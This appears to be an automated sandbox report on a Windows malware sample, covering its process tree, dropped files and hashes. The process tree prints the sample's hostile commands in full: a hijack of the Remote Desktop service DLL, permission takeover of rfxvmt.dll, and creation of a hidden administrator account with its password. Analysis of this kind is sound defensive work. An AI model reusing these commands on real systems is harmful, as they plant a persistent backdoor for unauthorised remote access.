Analysis
-
max time kernel
124s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
20-05-2022 06:21
Static task
static1
Behavioral task
behavioral1
Sample
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
Resource
win10v2004-20220414-en
General
-
Target
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe
-
Size
2.4MB
-
MD5
c9d8d20830f3b513e9c07c6f7d3b9270
-
SHA1
ef53837929f88ecc9aeb2d16bed2940eb8175d03
-
SHA256
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f
-
SHA512
d8cf1ac44e1df0ff3bae6edfa2f59172576f02303709f4508de83916158c835599209942d5c8b3f4bbf32f5d872844ce1253c19cc4c8a4e565d32074c971123c
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2840 takeown.exe 780 icacls.exe 3524 icacls.exe 2576 icacls.exe 2544 icacls.exe 944 icacls.exe 4892 icacls.exe 252 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Windows\Help\servicedll.dll upx C:\Windows\Help\lababa.bin upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 3 IoCs
Processes:
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exepid process 4024 e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe 5052 5052 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exepid process 780 icacls.exe 3524 icacls.exe 2576 icacls.exe 2544 icacls.exe 944 icacls.exe 4892 icacls.exe 252 icacls.exe 2840 takeown.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 3 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\help\servicedll.dll powershell.exe File created C:\Windows\help\lababa.bin powershell.exe File created C:\Windows\help\portable.dat powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 684 684 -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 3068 powershell.exe Token: SeRestorePrivilege 3524 icacls.exe -
Suspicious use of WriteProcessMemory 52 IoCs
Processes:
e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.execmd.exewscript.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 4024 wrote to memory of 3976 4024 e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe cmd.exe PID 4024 wrote to memory of 3976 4024 e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe cmd.exe PID 3976 wrote to memory of 1404 3976 cmd.exe wscript.exe PID 3976 wrote to memory of 1404 3976 cmd.exe wscript.exe PID 1404 wrote to memory of 4628 1404 wscript.exe cmd.exe PID 1404 wrote to memory of 4628 1404 wscript.exe cmd.exe PID 4628 wrote to memory of 3068 4628 cmd.exe powershell.exe PID 4628 wrote to memory of 3068 4628 cmd.exe powershell.exe PID 3068 wrote to memory of 2840 3068 powershell.exe takeown.exe PID 3068 wrote to memory of 2840 3068 powershell.exe takeown.exe PID 3068 wrote to memory of 780 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 780 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 3524 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 3524 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 2576 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 2576 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 2544 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 2544 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 944 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 944 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 4892 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 4892 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 252 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 252 3068 powershell.exe icacls.exe PID 3068 wrote to memory of 232 3068 powershell.exe reg.exe PID 3068 wrote to memory of 232 3068 powershell.exe reg.exe PID 3068 wrote to memory of 1468 3068 powershell.exe net.exe PID 3068 wrote to memory of 1468 3068 powershell.exe net.exe PID 1468 wrote to memory of 3216 1468 net.exe net1.exe PID 1468 wrote to memory of 3216 1468 net.exe net1.exe PID 1712 wrote to memory of 3752 1712 cmd.exe net.exe PID 1712 wrote to memory of 3752 1712 cmd.exe net.exe PID 3752 wrote to memory of 5044 3752 net.exe net1.exe PID 3752 wrote to memory of 5044 3752 net.exe net1.exe PID 3068 wrote to memory of 4668 3068 powershell.exe cmd.exe PID 3068 wrote to memory of 4668 3068 powershell.exe cmd.exe PID 4636 wrote to memory of 3692 4636 cmd.exe net.exe PID 4636 wrote to memory of 3692 4636 cmd.exe net.exe PID 3692 wrote to memory of 4976 3692 net.exe net1.exe PID 3692 wrote to memory of 4976 3692 net.exe net1.exe PID 3628 wrote to memory of 4216 3628 cmd.exe net.exe PID 3628 wrote to memory of 4216 3628 cmd.exe net.exe PID 4216 wrote to memory of 2708 4216 net.exe net1.exe PID 4216 wrote to memory of 2708 4216 net.exe net1.exe PID 4084 wrote to memory of 5016 4084 cmd.exe net.exe PID 4084 wrote to memory of 5016 4084 cmd.exe net.exe PID 5016 wrote to memory of 2136 5016 net.exe net1.exe PID 5016 wrote to memory of 2136 5016 net.exe net1.exe PID 464 wrote to memory of 2640 464 cmd.exe net.exe PID 464 wrote to memory of 2640 464 cmd.exe net.exe PID 2640 wrote to memory of 540 2640 net.exe net1.exe PID 2640 wrote to memory of 540 2640 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe"C:\Users\Admin\AppData\Local\Temp\e505db3a1f3cc707a092462ba3997f54f6c125cbc8f502d0f33bf8e3b5f3962f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c wscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wscript.exewscript C:\Users\Admin\AppData\Local\Temp\reactor.vbs3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c rename C:\Users\Admin\AppData\Local\Temp\reactor.txt reactor.ps1& powershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps14⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ep bypass -f C:\Users\Admin\AppData\Local\Temp\reactor.ps15⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\servicedll.dll /f6⤵
- Modifies registry key
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f6⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VHV7xNE9 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VHV7xNE9 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VHV7xNE9 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TLWHJTYB$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc VHV7xNE91⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc VHV7xNE92⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc VHV7xNE93⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\9887742.txtFilesize
149KB
MD5f63cb26ded5c82a6c82e5160933da4ed
SHA19ae96ecea3c6c56a6e67e672cf9422d7427c04ff
SHA2567788a48c713d87538bedf7907733b03eb72d3682004b4d1795d0e6eb1b494f4c
SHA512985cbe9af1b9539eb5b67eef4b78bd7581247f3a4b7e4c3ecd6ced3694d9c56814dfd9a866797aa3edeebe68dc07f35513fd62b804d5a0c5699288c9b37adbab
-
C:\Users\Admin\AppData\Local\Temp\changelog_66663.txtFilesize
284KB
MD5a97cf439052cb972928acb8d809f9edc
SHA12bb935b6b2cf883315eacf3efec2b94bc1054961
SHA2569fed878f994d4778d1ee922ee0c7478cadfb16a119aa93e4e3e8fa555e9d4547
SHA512e861d95e20fd989080349e2257604fde204fda4090fac9d0f2fc413efc7731855a66b0342b902e373908fccb9f85f6777bcf1530d585d6e5bdfdd64e1809c907
-
C:\Users\Admin\AppData\Local\Temp\changes_765543.txtFilesize
102B
MD52262b6007676e3cbf03ea58815e85ca6
SHA13b4ea6d234879e6829d859dc681ca6f27878706c
SHA2567b362e61c8e00a05a2949bb47da3f9f5c31c7c8dfda160e474f2a3e5d9058d32
SHA5124ec2963ee3754d7159938719f52496ec9ec05ffe7c11957747a312bda99c3cfd016eb3f0d36c940d1d5720dc5b3f3e8cd5d0d7eea28d84a9b4227efb22561e9d
-
C:\Users\Admin\AppData\Local\Temp\install_455111.logFilesize
62KB
MD50c34e2096fc530535d1fb38b8e9f68a6
SHA1ac9912a3bf5da42cfa9bdc5a48a41c5336980f4a
SHA256fee2dc3b455813797160264ecebcda7c34707fdafc96320f843891500971fedb
SHA5120b4b21aecaff1b0e3a3ea9611954a4a32d3ae73c456373b0d6375d661192e09c608175de61abafc2f8bf264a7817a753052e1767ba3cb0755350af9966d66bdf
-
C:\Users\Admin\AppData\Local\Temp\log_455111.txtFilesize
36KB
MD52c50ffba8c7d98a9cb5fec3c2a6913df
SHA1849b62f4911551b69cab9bc5ca6cf1af7ca28fc0
SHA256f510b64ebae6560c829f3b7081bf6073633ad5cb089bf2fb7b86ae0ad96267b0
SHA5127d28e6f5d30c918a0324d487828de7cdbf22c6262a67927f110155a02f00f902263037eb0d1eff1ca31be744a0026d3081a5f74d7d47fc1e86b13c9f243ce750
-
C:\Users\Admin\AppData\Local\Temp\nsd77B7.tmp\System.dllFilesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
C:\Users\Admin\AppData\Local\Temp\reactor.txtFilesize
4KB
MD5c2a9670c6617c3acc5cc5099b1437e42
SHA16a83468dcaf55f74cd46fdf280ed8f354e6d93eb
SHA256c5b725434a92709e3bf65d44b5cb25712a2140141facb54396e25b29933c7b95
SHA512d2c789f800cae8420b36380155a5d1566b7bed9f2a609b739dee4d20064e7770efd48303000f0ee6aa79340d73b7557223af885ffc78aa32a7c372d04e2903a1
-
C:\Users\Admin\AppData\Local\Temp\reactor.vbsFilesize
139B
MD5c0a65d8cb9b5db7fdc9a178f8c80102d
SHA1733f50a72526784a61aaf77e5cddf13f904c1693
SHA256a55d04242cc9381741621d2918accce8fb9c4b8307013c9f828cacdd1d4895c2
SHA51236dc712d8a926c6a7bc4257345261ea0b7154daa97735123007e903cdb732ebf2fe0c3358f00b6b500cdccceecbc130cbc3f4a2a2a4f09974bcca8dc93ed4539
-
C:\Users\Admin\AppData\Local\Temp\readme_455111.txtFilesize
2.4MB
MD5c427e13edac52d92b85088800da0f68c
SHA1231c0cd0ad5e9734d8c2d4504a1025be24bebf0d
SHA2567c47428cdc44a7df3a3ced60872f4c9640d4a8daca5054f5ba8983fc433ab36b
SHA5124b947f365cf55307e92d3ed3ff2cbeda9d5b7ea6a1562d30cdf460161d16105d7c7949257376d726c15a9cf3543d0f95a868baf309ebf80800f4429bf2a4f943
-
C:\Windows\Help\lababa.binFilesize
937KB
MD5c59afead2b5626d312fedea8f9eb0c4a
SHA1c22f14f59a5851d6a365cf6dd590e74fe6e34363
SHA256ad7dc6c18fa2c9078229e167a09319b53c3d331ff272c258a27528c1bf4810b0
SHA5124313acb308184db8e7e338ba56de202a4c71a6984abdae8ecbd091e6c2f055f6dafef00fbf52031713f3d1d8518287fa0a6137d82dc64db7671906db1c90b9c8
-
C:\Windows\Help\servicedll.dllFilesize
58KB
MD5def5e867485841d1f2f53db3f0407514
SHA11fdfa582b37f4c0c06a998532856a89581a5fea0
SHA25625de2f4ca48b55ba403b08d94d64e97b5582fa76b51b9ac8e7bcaae111e04dfc
SHA512c470af48a66507dacf5129f0ae7d68df859443e2cb709a507fe6b23be1ff52ca9ded878adcb60997544e9227022d7dbc8bd91b89fa33a30eef8effb1d6dbaf43
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
memory/232-152-0x0000000000000000-mapping.dmp
-
memory/252-151-0x0000000000000000-mapping.dmp
-
memory/540-169-0x0000000000000000-mapping.dmp
-
memory/780-145-0x0000000000000000-mapping.dmp
-
memory/944-149-0x0000000000000000-mapping.dmp
-
memory/1404-132-0x0000000000000000-mapping.dmp
-
memory/1468-153-0x0000000000000000-mapping.dmp
-
memory/2136-167-0x0000000000000000-mapping.dmp
-
memory/2544-148-0x0000000000000000-mapping.dmp
-
memory/2576-147-0x0000000000000000-mapping.dmp
-
memory/2640-168-0x0000000000000000-mapping.dmp
-
memory/2708-165-0x0000000000000000-mapping.dmp
-
memory/2840-143-0x0000000000000000-mapping.dmp
-
memory/3068-136-0x0000000000000000-mapping.dmp
-
memory/3068-138-0x00007FFAE0AF0000-0x00007FFAE15B1000-memory.dmpFilesize
10.8MB
-
memory/3068-137-0x00000203B5AB0000-0x00000203B5AD2000-memory.dmpFilesize
136KB
-
memory/3216-154-0x0000000000000000-mapping.dmp
-
memory/3524-146-0x0000000000000000-mapping.dmp
-
memory/3692-162-0x0000000000000000-mapping.dmp
-
memory/3752-159-0x0000000000000000-mapping.dmp
-
memory/3976-131-0x0000000000000000-mapping.dmp
-
memory/4216-164-0x0000000000000000-mapping.dmp
-
memory/4628-134-0x0000000000000000-mapping.dmp
-
memory/4668-161-0x0000000000000000-mapping.dmp
-
memory/4892-150-0x0000000000000000-mapping.dmp
-
memory/4976-163-0x0000000000000000-mapping.dmp
-
memory/5016-166-0x0000000000000000-mapping.dmp
-
memory/5044-160-0x0000000000000000-mapping.dmp